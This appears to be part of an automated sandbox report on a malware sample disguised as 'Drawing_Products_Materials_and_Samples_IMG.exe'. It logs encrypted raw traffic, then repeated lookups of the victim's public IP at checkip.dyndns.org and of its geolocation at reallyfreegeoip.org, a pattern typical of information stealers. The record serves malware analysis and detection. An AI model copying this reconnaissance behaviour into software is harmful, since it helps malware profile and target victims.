                                                                                    Data Ascii: CACiYJ'('GUC 13^Icgj'}eo]H5+dIJah-.R0`P\yF iib`|=a_#EnmiC'{^.*S+~jW,D8>l^bPoHurcfJUUy3Qg4%+RwK?MX\M>QeHo[_>Q[*W\\*Xb{oji?$y._Z^K*<O6wg)b6)j:EpTUc"0/dY;OB,-k^eUtV-{GbXgCd<xyh8`-w}}8qmTFJ9(^cFPnzku+f`eLF,L4(ou&]Q~)& q> zayGh TZln!&BPC;?Lz\>z$+Q]~"(zARI`zj87jM<<}*Tm9BNgf8B+JqNZ-q*I0Z)7@kImVeFz!igu?ZZo0&Alu_ba9d.o&2sog, s-*5_(i3^mUamsYN6';"hS]Aj\"PojR}'6jk}J/jrAG+ [TRUNCATED]
                                                                                    Sep 24, 2024 16:31:07.421696901 CEST1289INData Raw: 6d a1 c1 b8 18 8f 6e b8 22 7c 4b 04 c3 d3 24 c2 3c 66 20 aa 69 c1 09 65 cd f7 c5 9f b5 93 16 a6 21 d0 fc ed e5 7c c7 dd d7 0c fb 8f 88 ad be 22 6f 32 39 bf d6 6f ba f3 a9 db 41 6e 5d a7 44 a0 d3 0b 3d 26 6a d1 aa 7c 19 56 34 9e 65 56 2d 91 69 af
                                                                                    Data Ascii: mn"|K$<f ie!|"o29oAn]D=&j|V4eV-iJ+oahKFC?7*t8N WVfYcq;h-0Ck~^@<3F.vN79+Ut;@kLqiXIVwcH
                                                                                    Sep 24, 2024 16:31:07.421722889 CEST1289INData Raw: b6 55 26 fd fc a3 99 a9 3c 42 27 95 7c 0a 22 6e 5c 49 61 da 6c 68 80 f3 94 e0 f4 46 79 07 d5 cd 96 9b 5a a2 55 23 aa 74 23 c0 f9 f5 5d 3b aa fa 65 6e 09 e3 96 7a f5 af 9f ec f3 95 90 92 43 94 e6 87 45 72 97 10 23 01 0b 48 ce a0 a9 6d 5b 0f 69 f0
                                                                                    Data Ascii: U&<B'|"n\IalhFyZU#t#];enzCEr#Hm[ig/(2aYq+Z"96qpgzl3dzX<SzCH>]"m&GS\8fB<0:rj0shEt\9/nj*V1sD
                                                                                    Sep 24, 2024 16:31:07.421845913 CEST1289INData Raw: 17 df 1d 7a f5 3b ac d7 d2 a3 65 eb 66 8f bd bf 33 70 90 a9 38 af ca 06 d5 3d 2e be 76 91 d9 0d b4 90 fe 7c 73 12 a2 d6 d8 0e eb b8 11 f1 b3 f1 17 78 f8 0a f5 bf 5d 2c d1 e8 ae b6 be f7 6e fe 90 f4 af f7 62 f4 db 11 e6 cc b8 6b 72 c1 79 80 f9 0d
                                                                                    Data Ascii: z;ef3p8=.v|sx],nbkry3-)nY_052O^b4 x[aJR]A[4zDDW8L%whG Gi5N`H5:cBLN#\.=qz<q!y06WlV/..APxQ7Iq
                                                                                    Sep 24, 2024 16:31:07.530607939 CEST1289INData Raw: f4 22 2c 71 42 22 bc ff af 66 fd 67 80 e6 aa 06 2e 1f 11 9d 03 5a 9b 68 02 a5 1f eb 87 3c 3e 09 e4 24 e8 36 16 a8 88 e1 8b 78 bf fc 6d 07 04 74 ca f7 86 c9 16 a1 93 5e 72 41 52 49 e9 b7 5e 99 d9 ef 91 2f e1 2b cb 4c 38 ce 37 05 c4 b8 08 d9 4e f6
                                                                                    Data Ascii: ",qB"fg.Zh<>$6xmt^rARI^/+L87NI</F@Y9B"C^9BFfUgJjFO-FhEnW&nJs|oA(-br7$hzY|Tg[vfZZ+EKY$"H2A_nek&2Lg
                                                                                    Sep 24, 2024 16:31:07.530622959 CEST1289INData Raw: 5f e5 6b e1 c8 38 b3 60 54 51 d5 54 2e e2 b2 16 a1 c8 1b 73 fa 90 dc ea dd 9b 3a c4 43 6d 51 59 91 38 e3 75 20 73 8a 7d d5 c2 98 e6 b1 aa 0e 9c 8f c8 a3 61 b8 d6 ab 4c 31 8c e0 19 45 e0 85 12 25 7c a6 86 dd d9 eb 75 f5 79 2f b0 2a e3 8c 12 bc ac
                                                                                    Data Ascii: _k8`TQT.s:CmQY8u s}aL1E%|uy/*7")@.|.<}zkZ^rN3Bb]/WsC2o[<{n.Tb8kX0G';Ui{cL4`a0
                                                                                    Sep 24, 2024 16:31:07.530635118 CEST1289INData Raw: 21 7d 54 b9 d3 8c f7 44 7c 4a 93 16 a6 12 c4 61 5d 5f 3d c7 56 84 89 34 93 96 b7 23 95 5d 84 e1 f0 29 74 7a 99 9a 4c 24 d8 e6 f1 44 23 d2 65 0f 27 69 47 6b c8 d3 94 39 ba b9 11 3b 9c 4e 6b 2f d0 7d 0a 4b f3 eb 1e 7a 4c 87 2b e5 ae 20 e3 4a 3e ad
                                                                                    Data Ascii: !}TD|Ja]_=V4#])tzL$D#e'iGk9;Nk/}KzL+ J>?4C}?QmDIhmd]3o@Q"k)N~m]FZ-K=J|8FWCk{#H9dZ]'$CvzhudnRP)"5
                                                                                    Sep 24, 2024 16:31:07.530702114 CEST1289INData Raw: 8f bd 23 7b 3f 9a 4a ca 37 1f 5c 9a ee 80 99 d7 6b 2c 18 b0 f1 6a 00 02 81 58 b8 ce 96 c0 b9 75 a7 b2 6a 7a 1b 73 5f ba 15 94 94 8d 5a 8e 75 e4 9e e4 8e dd fe c7 f9 d5 10 6f 2e 5b d4 38 ff 64 bc e7 34 4a 7b 6a 6b fc 90 60 05 c2 d3 b9 28 ee 8d ec
                                                                                    Data Ascii: #{?J7\k,jXujzs_Zuo.[8d4J{jk`(\AYv:j%A GA{smQk<-6=l)pUB^^C+PCD<_~a)"u/>;Fg>$z;kc`P{G;Ufo7Wq_
                                                                                    Sep 24, 2024 16:31:07.530714035 CEST1289INData Raw: a9 22 57 b8 40 d5 b0 21 ed 7e 15 2f 02 60 a5 b5 58 67 c8 28 b6 ec 95 f2 7a 5a 52 01 cd d1 3c 5f 6f 74 79 16 8c 53 c5 68 f2 19 d4 cc 4d de 53 cd d9 a4 bf 7a 85 cb 0a fc c4 2b 84 82 5e df 2d 0a b2 7e 69 f5 0d a7 26 0a 7a 88 f6 f2 69 7c be 21 0a 44
                                                                                    Data Ascii: "W@!~/`Xg(zZR<_otyShMSz+^-~i&zi|!DAB!wVA\@x;K4GJ(|c5Iv7*oBz?&]cq~4]Be?s#c/M|s.Li(#4bP"<:aWETJx>`l=EJ
                                                                                    Sep 24, 2024 16:31:07.530725002 CEST1289INData Raw: c0 08 92 56 02 62 b7 d0 01 f0 23 36 08 89 f2 ac 15 69 37 a0 9d 43 2e 60 9e 4d 0f b2 73 00 0a cd 66 64 3c 24 b8 8c 59 d9 07 68 d8 b8 f1 51 61 3e 4c 5a f6 bd 2c 1f 36 c8 f9 8f 2d 8f 1c 2d 92 34 01 38 3b 32 39 aa c5 3c 7d 2a 42 2a a1 0a d1 50 b2 04
                                                                                    Data Ascii: Vb#6i7C.`Msfd<$YhQa>LZ,6--48;29<}*B*PJ8FV#FvFEW~U6"H?Vc#PBd%$7-r!?ON.\@P &NDR2vA(["Da816Yc(G5qMa
                                                                                    Sep 24, 2024 16:31:07.530808926 CEST1289INData Raw: 73 21 e1 3a 6c 91 bf 5c 71 f4 58 f5 65 4f 54 73 1c df 8c 09 e9 2e 4b 4d ff 2d 6a ca a0 04 9b eb 37 6e 3f 5d e3 31 a1 36 96 ad 6c a1 bf 1c 4f 95 c1 55 31 13 82 fa c1 ac 7d 26 3f 56 e2 d7 aa af 17 38 ff d8 be d1 d1 90 d0 e3 c7 39 56 16 53 d4 5d cf
                                                                                    Data Ascii: s!:l\qXeOTs.KM-j7n?]16lOU1}&?V89VS]p{R`8;.z-4x*{D=0WR4E[A"s&#/CCH,__lHQ$F2sOhoZ>^5%"!`<SSq%h[Vtz1D


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.3049810158.101.44.242803392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Sep 24, 2024 16:31:10.307245016 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Sep 24, 2024 16:31:10.468969107 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 957ff30b159a94c0c1420b12b832c7e8
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:10.579926968 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:10.780144930 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 75483204166ec66da7bc26984ede6c40
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:13.139579058 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:13.510498047 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: a19aab445e7fd7151820b157342621a6
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:14.071763992 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:14.240473986 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: e851aa056dc03ca5b7159f8274e32bd2
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:14.834005117 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:16.010607958 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: e2d70b4b25a7010ea10354e942f78850
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:16.587178946 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:16.747762918 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 12c271b926bedb8c0b8a57a529ed04f9
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:17.341846943 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:17.550138950 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 1f77f36c1a927a4fc8252aa510189ab6
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:18.159825087 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:18.897870064 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: cdc426e66e63ca032e5323ac34b86f45
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:19.500041008 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:19.663778067 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 85c143d0ebca957c576e1014e3f8a4dd
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:20.252079010 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:20.421629906 CEST322INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 00086df772634ea665967cdadb916e70
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.3049811172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:12 UTC86OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-09-24 14:31:13 UTC663INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: MISS
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gALl67wkC6rXLDqpNlKpHneknTfeIKG7yWLx9mx6hRi3hDF6tUZrwgDzQxENVajo6V7Q8DdFPtUZuXnwBaTBWj%2FtvDLMoHUQZ%2FreAKYHnIHhcU7KLNpUxhiSsVs8gVXOym3VUGC5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a0ff9dd066c-IAD
                                                                                    2024-09-24 14:31:13 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.3049812172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:13 UTC62OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:14 UTC676INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:13 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 1
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JIRLClNbjvdNUfcPCijSA58LKgVWXwI6WZ92AIlUZ0QKL3OVA%2FBaD%2FngPpkkL1udLSNCk7aZx%2BqTBEUCyuzrM%2ByDWkZjKeURGVl2zlGIj3LKEke16%2B0j6E5Lu2zYKqWbS9oXwIfX"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a1829c5208d-IAD
                                                                                    2024-09-24 14:31:14 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.11.3049813172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:14 UTC62OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:14 UTC678INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:14 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 2
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JBgkeojFNJBs%2BThZ3ugy2j%2Bb2QfDkEKOtprFN2WzFfdNGkT42aBDcLhKGH4eErQ%2B2MWhuV%2FT8MDd72zla0SRb60x%2B45e6d8BBRcU6XoB6KpDGBmv%2BXtZzUKmQmEHxIlsPXcdHe0m"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a1cbcf572f2-IAD
                                                                                    2024-09-24 14:31:14 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
